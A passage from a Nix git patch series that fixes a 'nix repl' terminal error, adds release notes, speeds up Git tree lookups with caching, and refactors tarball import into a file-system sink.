--- a/src/libutil/file-content-address.cc
+++ b/src/libutil/file-content-address.cc
@@ -23,7 +23,7 @@ std::string_view renderFileIngestionMethod(FileIngestionMethod method)
     case FileIngestionMethod::Recursive:
         return "nar";
     default:
-        assert(false);
+        abort();
     }
 }
 

From a694cfb7bd6fadc9b0c385551c0255ec5c0da068 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Tue, 13 Feb 2024 11:09:12 -0800
Subject: [PATCH 472/654] Fix "Failed tcsetattr(TCSADRAIN)" when `nix repl` is
 not a TTY

Before:
```
$ echo builtins.nixVersion | nix repl
Welcome to Nix 2.18.1. Type :? for help.

Failed tcsetattr(TCSADRAIN): Inappropriate ioctl for device
"2.18.1"

Failed tcsetattr(TCSADRAIN): Inappropriate ioctl for device
```

After:
```
$ echo builtins.nixVersion | nix repl
Nix 2.21.0pre20240131_dirty
Type :? for help.
"2.21.0pre20240131_dirty"
```
---
 src/libcmd/repl.cc | 1 -
 1 file changed, 1 deletion(-)

diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index 26b032693..a7cd15efe 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -351,7 +351,6 @@ bool NixRepl::getLine(std::string & input, const std::string & prompt)
     };
 
     setupSignals();
-    Finally resetTerminal([&]() { rl_deprep_terminal(); });
     char * s = readline(prompt.c_str());
     Finally doFree([&]() { free(s); });
     restoreSignals();

From 6d2b446e2b71d288f0f9e02270c948f66516f33e Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Wed, 14 Feb 2024 08:49:47 -0800
Subject: [PATCH 473/654] Add release notes for "Pretty print values in `nix
 repl`"

---
 .../rl-next/pretty-print-in-nix-repl.md       | 24 +++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 doc/manual/rl-next/pretty-print-in-nix-repl.md

diff --git a/doc/manual/rl-next/pretty-print-in-nix-repl.md b/doc/manual/rl-next/pretty-print-in-nix-repl.md
new file mode 100644
index 000000000..26ba5162a
--- /dev/null
+++ b/doc/manual/rl-next/pretty-print-in-nix-repl.md
@@ -0,0 +1,24 @@
+---
+synopsis: "`nix repl` pretty-prints values"
+prs: 9931
+---
+
+`nix repl` will now pretty-print values:
+
+```
+{
+  attrs = {
+    a = {
+      b = {
+        c = { };
+      };
+    };
+  };
+  list = [ 1 ];
+  list' = [
+    1
+    2
+    3
+  ];
+}
+```

From 67a6d344487af252d25001b5c43409b56b33ac9d Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Wed, 14 Feb 2024 19:07:18 +0100
Subject: [PATCH 474/654] GitInputAccessor: Speed up lookup()

A command like

  rm -rf ~/.cache/nix/tarball-cache/ ~/.cache/nix/fetcher-cache-v1.sqlite*; nix flake metadata 'git+file:///home/eelco/Dev/nixpkgs?rev=9463103069725474698139ab10f17a9d125da859'

was spending about 84% of its runtime in lookup(), specifically in
git_tree_entry_bypath(). (The reading of blobs is less than 3%.)

It appears libgit2 doesn't do a lot of caching of trees, so we now
make sure that when we look up a path, we add all its parents, and all
the immediate children of the parents (since we have them in memory
anyway), to our own cache.

This speed up the command above from 17.2s to 7.8s on my machine.

Fixes (or at least should improve a lot) #9684.
---
 src/libfetchers/git-utils.cc | 61 ++++++++++++++++++++++++++++++------
 1 file changed, 51 insertions(+), 10 deletions(-)

diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc
index cb4a84e53..466bdc6c7 100644
--- a/src/libfetchers/git-utils.cc
+++ b/src/libfetchers/git-utils.cc
@@ -576,20 +576,61 @@ struct GitInputAccessor : InputAccessor
     /* Recursively look up 'path' relative to the root. */
     git_tree_entry * lookup(const CanonPath & path)
     {
-        if (path.isRoot()) return nullptr;
-
         auto i = lookupCache.find(path);
-        if (i == lookupCache.end()) {
-            TreeEntry entry;
-            if (auto err = git_tree_entry_bypath(Setter(entry), root.get(), std::string(path.rel()).c_str())) {
-                if (err != GIT_ENOTFOUND)
-                    throw Error("looking up '%s': %s", showPath(path), git_error_last()->message);
-            }
+        if (i != lookupCache.end()) return i->second.get();
 
-            i = lookupCache.emplace(path, std::move(entry)).first;
+        auto parent = path.parent();
+        if (!parent) return nullptr;
+
+        auto name = path.baseName().value();
+
+        auto parentTree = lookupTree(*parent);
+        if (!parentTree) return nullptr;
+
+        auto count = git_tree_entrycount(parentTree->get());
+
+        git_tree_entry * res = nullptr;
+
+        /* Add all the tree entries to the cache to speed up
+           subsequent lookups. */
+        for (size_t n = 0; n < count; ++n) {
+            auto entry = git_tree_entry_byindex(parentTree->get(), n);
+
+            TreeEntry copy;
+            if (git_tree_entry_dup(Setter(copy), entry))
+                throw Error("dupping tree entry: %s", git_error_last()->message);
+
+            auto entryName = std::string_view(git_tree_entry_name(entry));
+
+            if (entryName == name)
+                res = copy.get();
+
+            auto path2 = *parent;
+            path2.push(entryName);
+            lookupCache.emplace(path2, std::move(copy)).first->second.get();
         }
 
-        return &*i->second;
+        return res;
+    }
+
+    std::optional lookupTree(const CanonPath & path)
+    {
+        if (path.isRoot()) {
+            Tree tree;
+            if (git_tree_dup(Setter(tree), root.get()))
+                throw Error("duplicating directory '%s': %s", showPath(path), git_error_last()->message);
+            return tree;
+        }
+
+        auto entry = lookup(path);
+        if (!entry || git_tree_entry_type(entry) != GIT_OBJECT_TREE)
+            return std::nullopt;
+
+        Tree tree;
+        if (git_tree_entry_to_object((git_object * *) (git_tree * *) Setter(tree), *repo, entry))
+            throw Error("looking up directory '%s': %s", showPath(path), git_error_last()->message);
+
+        return tree;
     }
 
     git_tree_entry * need(const CanonPath & path)

From ba6a5f06eeaeb2a81f4e6871b8ef19927987409e Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Thu, 21 Dec 2023 03:49:52 -0500
Subject: [PATCH 475/654] Split `GitRepoImpl::importTarball`

There is now a separation of:

1. A `FileSystemObjectSink` for writing to git repos

2. Adapting libarchive to use that parse sink.

The prepares a proper separation of concerns.
---
 src/libfetchers/git-utils.cc | 388 +++++++++++++++++++++--------------
 src/libfetchers/git-utils.hh |  15 +-
 src/libutil/fs-sink.hh       |   2 +
 3 files changed, 249 insertions(+), 156 deletions(-)

diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc
index 51631e769..980a5a4d7 100644
--- a/src/libfetchers/git-utils.cc
+++ b/src/libfetchers/git-utils.cc
@@ -7,6 +7,7 @@
 #include "processes.hh"
 #include "signals.hh"
 #include "users.hh"
+#include "fs-sink.hh"
 
 #include 
 #include 
@@ -23,9 +24,6 @@
 #include 
 #include 
 
-#include "tarfile.hh"
-#include 
-
 #include 
 #include 
 #include 
@@ -317,157 +315,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this
         return std::nullopt;
     }
 
-    TarballInfo importTarball(Source & source) override
-    {
-        TarArchive archive(source);
-
-        struct PendingDir
-        {
-            std::string name;
-            TreeBuilder builder;
-        };
-
-        std::vector pendingDirs;
-
-        auto pushBuilder = [&](std::string name)
-        {
-            git_treebuilder * b;
-            if (git_treebuilder_new(&b, *this, nullptr))
-                throw Error("creating a tree builder: %s", git_error_last()->message);
-            pendingDirs.push_back({ .name = std::move(name), .builder = TreeBuilder(b) });
-        };
-
-        auto popBuilder = [&]() -> std::pair
-        {
-            assert(!pendingDirs.empty());
-            auto pending = std::move(pendingDirs.back());
-            git_oid oid;
-            if (git_treebuilder_write(&oid, pending.builder.get()))
-                throw Error("creating a tree object: %s", git_error_last()->message);
-            pendingDirs.pop_back();
-            return {oid, pending.name};
-        };
-
-        auto addToTree = [&](const std::string & name, const git_oid & oid, git_filemode_t mode)
-        {
-            assert(!pendingDirs.empty());
-            auto & pending = pendingDirs.back();
-            if (git_treebuilder_insert(nullptr, pending.builder.get(), name.c_str(), &oid, mode))
-                throw Error("adding a file to a tree builder: %s", git_error_last()->message);
-        };
-
-        auto updateBuilders = [&](std::span names)
-        {
-            // Find the common prefix of pendingDirs and names.
-            size_t prefixLen = 0;
-            for (; prefixLen < names.size() && prefixLen + 1 < pendingDirs.size(); ++prefixLen)
-                if (names[prefixLen] != pendingDirs[prefixLen + 1].name)
-                    break;
-
-            // Finish the builders that are not part of the common prefix.
-            for (auto n = pendingDirs.size(); n > prefixLen + 1; --n) {
-                auto [oid, name] = popBuilder();
-                addToTree(name, oid, GIT_FILEMODE_TREE);
-            }
-
-            // Create builders for the new directories.
-            for (auto n = prefixLen; n < names.size(); ++n)
-                pushBuilder(names[n]);
-        };
-
-        pushBuilder("");
-
-        size_t componentsToStrip = 1;
-
-        time_t lastModified = 0;
-
-        for (;;) {
-            // FIXME: merge with extract_archive
-            struct archive_entry * entry;
-            int r = archive_read_next_header(archive.archive, &entry);
-            if (r == ARCHIVE_EOF) break;
-            auto path = archive_entry_pathname(entry);
-            if (!path)
-                throw Error("cannot get archive member name: %s", archive_error_string(archive.archive));
-            if (r == ARCHIVE_WARN)
-                warn(archive_error_string(archive.archive));
-            else
-                archive.check(r);
-
-            lastModified = std::max(lastModified, archive_entry_mtime(entry));
-
-            auto pathComponents = tokenizeString>(path, "/");
-
-            std::span pathComponents2{pathComponents};
-
-            if (pathComponents2.size() <= componentsToStrip) continue;
-            pathComponents2 = pathComponents2.subspan(componentsToStrip);
-
-            updateBuilders(
-                archive_entry_filetype(entry) == AE_IFDIR
-                ? pathComponents2
-                : pathComponents2.first(pathComponents2.size() - 1));
-
-            switch (archive_entry_filetype(entry)) {
-
-            case AE_IFDIR:
-                // Nothing to do right now.
-                break;
-
-            case AE_IFREG: {
-
-                git_writestream * stream = nullptr;
-                if (git_blob_create_from_stream(&stream, *this, nullptr))
-                    throw Error("creating a blob stream object: %s", git_error_last()->message);
-
-                while (true) {
-                    std::vector buf(128 * 1024);
-                    auto n = archive_read_data(archive.archive, buf.data(), buf.size());
-                    if (n < 0)
-                        throw Error("cannot read file '%s' from tarball", path);
-                    if (n == 0) break;
-                    if (stream->write(stream, (const char *) buf.data(), n))
-                        throw Error("writing a blob for tarball member '%s': %s", path, git_error_last()->message);
-                }
-
-                git_oid oid;
-                if (git_blob_create_from_stream_commit(&oid, stream))
-                    throw Error("creating a blob object for tarball member '%s': %s", path, git_error_last()->message);
-
-                addToTree(*pathComponents.rbegin(), oid,
-                    archive_entry_mode(entry) & S_IXUSR
-                    ? GIT_FILEMODE_BLOB_EXECUTABLE
-                    : GIT_FILEMODE_BLOB);
-
-                break;
-            }
-
-            case AE_IFLNK: {
-                auto target = archive_entry_symlink(entry);
-
-                git_oid oid;
-                if (git_blob_create_from_buffer(&oid, *this, target, strlen(target)))
-                    throw Error("creating a blob object for tarball symlink member '%s': %s", path, git_error_last()->message);
-
-                addToTree(*pathComponents.rbegin(), oid, GIT_FILEMODE_LINK);
-
-                break;
-            }
-
-            default:
-                throw Error("file '%s' in tarball has unsupported file type", path);
-            }
-        }
-
-        updateBuilders({});
-
-        auto [oid, _name] = popBuilder();
-
-        return TarballInfo {
-            .treeHash = toHash(oid),
-            .lastModified = lastModified
-        };
-    }
+    TarballInfo importTarball(Source & source) override;
 
     std::vector> getSubmodules(const Hash & rev, bool exportIgnore) override;
 
@@ -511,6 +359,8 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this
 
     ref getAccessor(const WorkdirInfo & wd, bool exportIgnore, MakeNotAllowedError e) override;
 
+    ref getFileSystemObjectSink() override;
+
     static int sidebandProgressCallback(const char * str, int len, void * payload)
     {
         auto act = (Activity *) payload;
@@ -884,6 +734,154 @@ struct GitExportIgnoreInputAccessor : CachingFilteringInputAccessor {
 
 };
 
+struct GitFileSystemObjectSinkImpl : GitFileSystemObjectSink
+{
+    ref repo;
+
+    struct PendingDir
+    {
+        std::string name;
+        TreeBuilder builder;
+    };
+
+    std::vector pendingDirs;
+
+    size_t componentsToStrip = 1;
+
+    void pushBuilder(std::string name)
+    {
+        git_treebuilder * b;
+        if (git_treebuilder_new(&b, *repo, nullptr))
+            throw Error("creating a tree builder: %s", git_error_last()->message);
+        pendingDirs.push_back({ .name = std::move(name), .builder = TreeBuilder(b) });
+    };
+
+    GitFileSystemObjectSinkImpl(ref repo) : repo(repo)
+    {
+        pushBuilder("");
+    }
+
+    std::pair popBuilder()
+    {
+        assert(!pendingDirs.empty());
+        auto pending = std::move(pendingDirs.back());
+        git_oid oid;
+        if (git_treebuilder_write(&oid, pending.builder.get()))
+            throw Error("creating a tree object: %s", git_error_last()->message);
+        pendingDirs.pop_back();
+        return {oid, pending.name};
+    };
+
+    void addToTree(const std::string & name, const git_oid & oid, git_filemode_t mode)
+    {
+        assert(!pendingDirs.empty());
+        auto & pending = pendingDirs.back();
+        if (git_treebuilder_insert(nullptr, pending.builder.get(), name.c_str(), &oid, mode))
+            throw Error("adding a file to a tree builder: %s", git_error_last()->message);
+    };
+
+    void updateBuilders(std::span names)
+    {
+        // Find the common prefix of pendingDirs and names.
+        size_t prefixLen = 0;
+        for (; prefixLen < names.size() && prefixLen + 1 < pendingDirs.size(); ++prefixLen)
+            if (names[prefixLen] != pendingDirs[prefixLen + 1].name)
+                break;
+
+        // Finish the builders that are not part of the common prefix.
+        for (auto n = pendingDirs.size(); n > prefixLen + 1; --n) {
+            auto [oid, name] = popBuilder();
+            addToTree(name, oid, GIT_FILEMODE_TREE);
+        }
+
+        // Create builders for the new directories.
+        for (auto n = prefixLen; n < names.size(); ++n)
+            pushBuilder(names[n]);
+    };
+
+    bool prepareDirs(const std::vector & pathComponents, bool isDir)
+    {
+        std::span pathComponents2{pathComponents};
+
+        if (pathComponents2.size() <= componentsToStrip) return false;
+        pathComponents2 = pathComponents2.subspan(componentsToStrip);
+
+        updateBuilders(
+            isDir
+            ? pathComponents2
+            : pathComponents2.first(pathComponents2.size() - 1));
+
+        return true;
+    }
+
+    void createRegularFile(
+        const Path & path,
+        std::function func) override
+    {
+        auto pathComponents = tokenizeString>(path, "/");
+        if (!prepareDirs(pathComponents, false)) return;
+
+        git_writestream * stream = nullptr;
+        if (git_blob_create_from_stream(&stream, *repo, nullptr))
+            throw Error("creating a blob stream object: %s", git_error_last()->message);
+
+        struct CRF : CreateRegularFileSink {
+            const Path & path;
+            GitFileSystemObjectSinkImpl & back;
+            git_writestream * stream;
+            bool executable = false;
+            CRF(const Path & path, GitFileSystemObjectSinkImpl & back, git_writestream * stream)
+                : path(path), back(back), stream(stream)
+            {}
+            void operator () (std::string_view data) override
+            {
+                if (stream->write(stream, data.data(), data.size()))
+                    throw Error("writing a blob for tarball member '%s': %s", path, git_error_last()->message);
+            }
+            void isExecutable() override
+            {
+                executable = true;
+            }
+        } crf { path, *this, stream };
+        func(crf);
+
+        git_oid oid;
+        if (git_blob_create_from_stream_commit(&oid, stream))
+            throw Error("creating a blob object for tarball member '%s': %s", path, git_error_last()->message);
+
+        addToTree(*pathComponents.rbegin(), oid,
+            crf.executable
+            ? GIT_FILEMODE_BLOB_EXECUTABLE
+            : GIT_FILEMODE_BLOB);
+    }
+
+    void createDirectory(const Path & path) override
+    {
+        auto pathComponents = tokenizeString>(path, "/");
+        (void) prepareDirs(pathComponents, true);
+    }
+
+    void createSymlink(const Path & path, const std::string & target) override
+    {
+        auto pathComponents = tokenizeString>(path, "/");
+        if (!prepareDirs(pathComponents, false)) return;
+
+        git_oid oid;
+        if (git_blob_create_from_buffer(&oid, *repo, target.c_str(), target.size()))
+            throw Error("creating a blob object for tarball symlink member '%s': %s", path, git_error_last()->message);
+
+        addToTree(*pathComponents.rbegin(), oid, GIT_FILEMODE_LINK);
+    }
+
+    Hash sync() override {
+        updateBuilders({});
+
+        auto [oid, _name] = popBuilder();
+
+        return toHash(oid);
+    }
+};
+
 ref GitRepoImpl::getRawAccessor(const Hash & rev)
 {
     auto self = ref(shared_from_this());
@@ -918,6 +916,11 @@ ref GitRepoImpl::getAccessor(const WorkdirInfo & wd, bool exportI
     }
 }
 
+ref GitRepoImpl::getFileSystemObjectSink()
+{
+    return make_ref(ref(shared_from_this()));
+}
+
 std::vector> GitRepoImpl::getSubmodules(const Hash & rev, bool exportIgnore)
 {
     /* Read the .gitmodules files from this revision. */
@@ -951,4 +954,81 @@ ref getTarballCache()
     return make_ref(repoDir, true, true);
 }
 
+}
+
+#include "tarfile.hh"
+#include 
+
+namespace nix {
+
+GitRepo::TarballInfo GitRepoImpl::importTarball(Source & source)
+{
+    TarArchive archive { source };
+
+    auto parseSink = getFileSystemObjectSink();
+
+    time_t lastModified = 0;
+
+    for (;;) {
+        // FIXME: merge with extract_archive
+        struct archive_entry * entry;
+        int r = archive_read_next_header(archive.archive, &entry);
+        if (r == ARCHIVE_EOF) break;
+        auto path = archive_entry_pathname(entry);
+        if (!path)
+            throw Error("cannot get archive member name: %s", archive_error_string(archive.archive));
+        if (r == ARCHIVE_WARN)
+            warn(archive_error_string(archive.archive));
+        else
+            archive.check(r);
+
+        lastModified = std::max(lastModified, archive_entry_mtime(entry));
+
+        switch (archive_entry_filetype(entry)) {
+
+        case AE_IFDIR:
+            parseSink->createDirectory(path);
+            break;
+
+        case AE_IFREG: {
+            parseSink->createRegularFile(path, [&](auto & crf) {
+                if (archive_entry_mode(entry) & S_IXUSR)
+                    crf.isExecutable();
+
+                while (true) {
+                    std::vector buf(128 * 1024);
+                    auto n = archive_read_data(archive.archive, buf.data(), buf.size());
+                    if (n < 0)
+                        throw Error("cannot read file '%s' from tarball", path);
+                    if (n == 0) break;
+                    crf(std::string_view {
+                        (const char *) buf.data(),
+                        (size_t) n,
+                    });
+                }
+            });
+
+            break;
+        }
+
+        case AE_IFLNK: {
+            auto target = archive_entry_symlink(entry);
+
+            parseSink->createSymlink(path, target);
+
+            break;
+        }
+
+        default:
+            throw Error("file '%s' in tarball has unsupported file type", path);
+        }
+    }
+
+    return TarballInfo {
+        .treeHash = parseSink->sync(),
+        .lastModified = lastModified
+    };
+}
+
+
 }
diff --git a/src/libfetchers/git-utils.hh b/src/libfetchers/git-utils.hh
index b54559def..f82f62fc8 100644
--- a/src/libfetchers/git-utils.hh
+++ b/src/libfetchers/git-utils.hh
@@ -2,11 +2,20 @@
 
 #include "filtering-input-accessor.hh"
 #include "input-accessor.hh"
+#include "fs-sink.hh"
 
 namespace nix {
 
 namespace fetchers { struct PublicKey; }
 
+struct GitFileSystemObjectSink : FileSystemObjectSink
+{
+    /**
+     * Flush builder and return a final Git hash.
+     */
+    virtual Hash sync() = 0;
+};
+
 struct GitRepo
 {
     virtual ~GitRepo()
@@ -70,14 +79,14 @@ struct GitRepo
         time_t lastModified;
     };
 
-    virtual TarballInfo importTarball(Source & source) = 0;
-
     virtual bool hasObject(const Hash & oid) = 0;
 
     virtual ref getAccessor(const Hash & rev, bool exportIgnore) = 0;
 
     virtual ref getAccessor(const WorkdirInfo & wd, bool exportIgnore, MakeNotAllowedError makeNotAllowedError) = 0;
 
+    virtual ref getFileSystemObjectSink() = 0;
+
     virtual void fetch(
         const std::string & url,
         const std::string & refspec,
@@ -90,6 +99,8 @@ struct GitRepo
     virtual void verifyCommit(
         const Hash & rev,
         const std::vector & publicKeys) = 0;
+
+    virtual TarballInfo importTarball(Source & source) = 0;
 };
 
 ref getTarballCache();
diff --git a/src/libutil/fs-sink.hh b/src/libutil/fs-sink.hh
index 4dfb5b329..ae577819a 100644
--- a/src/libutil/fs-sink.hh
+++ b/src/libutil/fs-sink.hh
@@ -26,6 +26,8 @@ struct CreateRegularFileSink : Sink
 
 struct FileSystemObjectSink
 {
+    virtual ~FileSystemObjectSink() = default;
+
     virtual void createDirectory(const Path & path) = 0;
 
     /**

From ed24baaec4f3825ce538d1894ced63bfc82db7c8 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Thu, 21 Dec 2023 04:28:06 -0500
Subject: [PATCH 476/654] Finish separating concerns with tarball cache

There is no longer an `importTarball` method. Instead, there is a
`unpackTarfileToSink` function (back in libutil). The caller can use
thisw with the `getParseSink` method we added in the last commit easily
enough.

In addition, tarball cache functionality is separated from `git-utils`
and moved into `tarball-cache`. This ensures we are separating mechanism
and policy.
---
 src/libfetchers/git-utils.cc     | 86 --------------------------------
 src/libfetchers/git-utils.hh     | 10 ----
 src/libfetchers/github.cc        | 15 ++++--
 src/libfetchers/tarball-cache.cc | 13 +++++
 src/libfetchers/tarball-cache.hh | 17 +++++++
 src/libutil/tarfile.cc           | 62 +++++++++++++++++++++++
 src/libutil/tarfile.hh           |  3 ++
 7 files changed, 107 insertions(+), 99 deletions(-)
 create mode 100644 src/libfetchers/tarball-cache.cc
 create mode 100644 src/libfetchers/tarball-cache.hh

diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc
index 980a5a4d7..42bf42de6 100644
--- a/src/libfetchers/git-utils.cc
+++ b/src/libfetchers/git-utils.cc
@@ -315,8 +315,6 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this
         return std::nullopt;
     }
 
-    TarballInfo importTarball(Source & source) override;
-
     std::vector> getSubmodules(const Hash & rev, bool exportIgnore) override;
 
     std::string resolveSubmoduleUrl(
@@ -947,88 +945,4 @@ std::vector> GitRepoImpl::getSubmodules
     return result;
 }
 
-ref getTarballCache()
-{
-    static auto repoDir = std::filesystem::path(getCacheDir()) / "nix" / "tarball-cache";
-
-    return make_ref(repoDir, true, true);
-}
-
-}
-
-#include "tarfile.hh"
-#include 
-
-namespace nix {
-
-GitRepo::TarballInfo GitRepoImpl::importTarball(Source & source)
-{
-    TarArchive archive { source };
-
-    auto parseSink = getFileSystemObjectSink();
-
-    time_t lastModified = 0;
-
-    for (;;) {
-        // FIXME: merge with extract_archive
-        struct archive_entry * entry;
-        int r = archive_read_next_header(archive.archive, &entry);
-        if (r == ARCHIVE_EOF) break;
-        auto path = archive_entry_pathname(entry);
-        if (!path)
-            throw Error("cannot get archive member name: %s", archive_error_string(archive.archive));
-        if (r == ARCHIVE_WARN)
-            warn(archive_error_string(archive.archive));
-        else
-            archive.check(r);
-
-        lastModified = std::max(lastModified, archive_entry_mtime(entry));
-
-        switch (archive_entry_filetype(entry)) {
-
-        case AE_IFDIR:
-            parseSink->createDirectory(path);
-            break;
-
-        case AE_IFREG: {
-            parseSink->createRegularFile(path, [&](auto & crf) {
-                if (archive_entry_mode(entry) & S_IXUSR)
-                    crf.isExecutable();
-
-                while (true) {
-                    std::vector buf(128 * 1024);
-                    auto n = archive_read_data(archive.archive, buf.data(), buf.size());
-                    if (n < 0)
-                        throw Error("cannot read file '%s' from tarball", path);
-                    if (n == 0) break;
-                    crf(std::string_view {
-                        (const char *) buf.data(),
-                        (size_t) n,
-                    });
-                }
-            });
-
-            break;
-        }
-
-        case AE_IFLNK: {
-            auto target = archive_entry_symlink(entry);
-
-            parseSink->createSymlink(path, target);
-
-            break;
-        }
-
-        default:
-            throw Error("file '%s' in tarball has unsupported file type", path);
-        }
-    }
-
-    return TarballInfo {
-        .treeHash = parseSink->sync(),
-        .lastModified = lastModified
-    };
-}
-
-
 }
diff --git a/src/libfetchers/git-utils.hh b/src/libfetchers/git-utils.hh
index f82f62fc8..029d39741 100644
--- a/src/libfetchers/git-utils.hh
+++ b/src/libfetchers/git-utils.hh
@@ -73,12 +73,6 @@ struct GitRepo
         const std::string & url,
         const std::string & base) = 0;
 
-    struct TarballInfo
-    {
-        Hash treeHash;
-        time_t lastModified;
-    };
-
     virtual bool hasObject(const Hash & oid) = 0;
 
     virtual ref getAccessor(const Hash & rev, bool exportIgnore) = 0;
@@ -99,10 +93,6 @@ struct GitRepo
     virtual void verifyCommit(
         const Hash & rev,
         const std::vector & publicKeys) = 0;
-
-    virtual TarballInfo importTarball(Source & source) = 0;
 };
 
-ref getTarballCache();
-
 }
diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc
index 1cfc142a5..8b3e6ff20 100644
--- a/src/libfetchers/github.cc
+++ b/src/libfetchers/github.cc
@@ -8,7 +8,9 @@
 #include "fetchers.hh"
 #include "fetch-settings.hh"
 #include "tarball.hh"
+#include "tarfile.hh"
 #include "git-utils.hh"
+#include "tarball-cache.hh"
 
 #include 
 #include 
@@ -191,7 +193,7 @@ struct GitArchiveInputScheme : InputScheme
 
     virtual DownloadUrl getDownloadUrl(const Input & input) const = 0;
 
-    std::pair downloadArchive(ref store, Input input) const
+    std::pair downloadArchive(ref store, Input input) const
     {
         if (!maybeGetStrAttr(input.attrs, "ref")) input.attrs.insert_or_assign("ref", "HEAD");
 
@@ -218,7 +220,7 @@ struct GitArchiveInputScheme : InputScheme
                 auto treeHash = getRevAttr(*treeHashAttrs, "treeHash");
                 auto lastModified = getIntAttr(*lastModifiedAttrs, "lastModified");
                 if (getTarballCache()->hasObject(treeHash))
-                    return {std::move(input), GitRepo::TarballInfo { .treeHash = treeHash, .lastModified = (time_t) lastModified }};
+                    return {std::move(input), TarballInfo { .treeHash = treeHash, .lastModified = (time_t) lastModified }};
                 else
                     debug("Git tree with hash '%s' has disappeared from the cache, refetching...", treeHash.gitRev());
             }
@@ -233,7 +235,14 @@ struct GitArchiveInputScheme : InputScheme
             getFileTransfer()->download(std::move(req), sink);
         });
 
-        auto tarballInfo = getTarballCache()->importTarball(*source);
+        TarArchive archive { *source };
+        auto parseSink = getTarballCache()->getFileSystemObjectSink();
+        auto lastModified = unpackTarfileToSink(archive, *parseSink);
+
+        TarballInfo tarballInfo {
+            .treeHash = parseSink->sync(),
+            .lastModified = lastModified
+        };
 
         cache->upsert(treeHashKey, Attrs{{"treeHash", tarballInfo.treeHash.gitRev()}});
         cache->upsert(lastModifiedKey, Attrs{{"lastModified", (uint64_t) tarballInfo.lastModified}});
diff --git a/src/libfetchers/tarball-cache.cc b/src/libfetchers/tarball-cache.cc
new file mode 100644
index 000000000..bb2c51973
--- /dev/null
+++ b/src/libfetchers/tarball-cache.cc
@@ -0,0 +1,13 @@
+#include "tarball-cache.hh"
+#include "users.hh"
+
+namespace nix::fetchers {
+
+ref getTarballCache()
+{
+    static auto repoDir = std::filesystem::path(getCacheDir()) / "nix" / "tarball-cache";
+
+    return GitRepo::openRepo(repoDir, true, true);
+}
+
+}
diff --git a/src/libfetchers/tarball-cache.hh b/src/libfetchers/tarball-cache.hh
new file mode 100644
index 000000000..e1517038b
--- /dev/null
+++ b/src/libfetchers/tarball-cache.hh
@@ -0,0 +1,17 @@
+#pragma once
+///@file
+
+#include "ref.hh"
+#include "git-utils.hh"
+
+namespace nix::fetchers {
+
+struct TarballInfo
+{
+    Hash treeHash;
+    time_t lastModified;
+};
+
+ref getTarballCache();
+
+}
diff --git a/src/libutil/tarfile.cc b/src/libutil/tarfile.cc
index 187b3e948..3bb6694f8 100644
--- a/src/libutil/tarfile.cc
+++ b/src/libutil/tarfile.cc
@@ -132,4 +132,66 @@ void unpackTarfile(const Path & tarFile, const Path & destDir)
     extract_archive(archive, destDir);
 }
 
+time_t unpackTarfileToSink(TarArchive & archive, FileSystemObjectSink & parseSink)
+{
+    time_t lastModified = 0;
+
+    for (;;) {
+        // FIXME: merge with extract_archive
+        struct archive_entry * entry;
+        int r = archive_read_next_header(archive.archive, &entry);
+        if (r == ARCHIVE_EOF) break;
+        auto path = archive_entry_pathname(entry);
+        if (!path)
+            throw Error("cannot get archive member name: %s", archive_error_string(archive.archive));
+        if (r == ARCHIVE_WARN)
+            warn(archive_error_string(archive.archive));
+        else
+            archive.check(r);
+
+        lastModified = std::max(lastModified, archive_entry_mtime(entry));
+
+        switch (archive_entry_filetype(entry)) {
+
+        case AE_IFDIR:
+            parseSink.createDirectory(path);
+            break;
+
+        case AE_IFREG: {
+            parseSink.createRegularFile(path, [&](auto & crf) {
+                if (archive_entry_mode(entry) & S_IXUSR)
+                    crf.isExecutable();
+
+                while (true) {
+                    std::vector buf(128 * 1024);
+                    auto n = archive_read_data(archive.archive, buf.data(), buf.size());
+                    if (n < 0)
+                        throw Error("cannot read file '%s' from tarball", path);
+                    if (n == 0) break;
+                    crf(std::string_view {
+                        (const char *) buf.data(),
+                        (size_t) n,
+                    });
+                }
+            });
+
+            break;
+        }
+
+        case AE_IFLNK: {
+            auto target = archive_entry_symlink(entry);
+
+            parseSink.createSymlink(path, target);
+
+            break;
+        }
+
+        default:
+            throw Error("file '%s' in tarball has unsupported file type", path);
+        }
+    }
+
+    return lastModified;
+}
+
 }
diff --git a/src/libutil/tarfile.hh b/src/libutil/tarfile.hh
index 237d18c31..6a9c42149 100644
--- a/src/libutil/tarfile.hh
+++ b/src/libutil/tarfile.hh
@@ -2,6 +2,7 @@
 ///@file
 
 #include "serialise.hh"
+#include "fs-sink.hh"
 #include 
 
 namespace nix {
@@ -29,4 +30,6 @@ void unpackTarfile(Source & source, const Path & destDir);
 
 void unpackTarfile(const Path & tarFile, const Path & destDir);
 
+time_t unpackTarfileToSink(TarArchive & archive, FileSystemObjectSink & parseSink);
+
 }

From 78b8db72b53b6657cbdaaac8ad6c0f99fb92ed10 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Thu, 15 Feb 2024 21:58:08 +0100
Subject: [PATCH 477/654] Remove tarball-cache.{hh,cc}

TarballInfo is only used in github.cc, and getTarballCache() is a bit
too trivial to have its own file.
---
 src/libfetchers/git-utils.cc     |  7 +++++++
 src/libfetchers/git-utils.hh     |  2 ++
 src/libfetchers/github.cc        |  7 ++++++-
 src/libfetchers/tarball-cache.cc | 13 -------------
 src/libfetchers/tarball-cache.hh | 17 -----------------
 5 files changed, 15 insertions(+), 31 deletions(-)
 delete mode 100644 src/libfetchers/tarball-cache.cc
 delete mode 100644 src/libfetchers/tarball-cache.hh

diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc
index 32f665aa0..4f034e9d4 100644
--- a/src/libfetchers/git-utils.cc
+++ b/src/libfetchers/git-utils.cc
@@ -986,4 +986,11 @@ std::vector> GitRepoImpl::getSubmodules
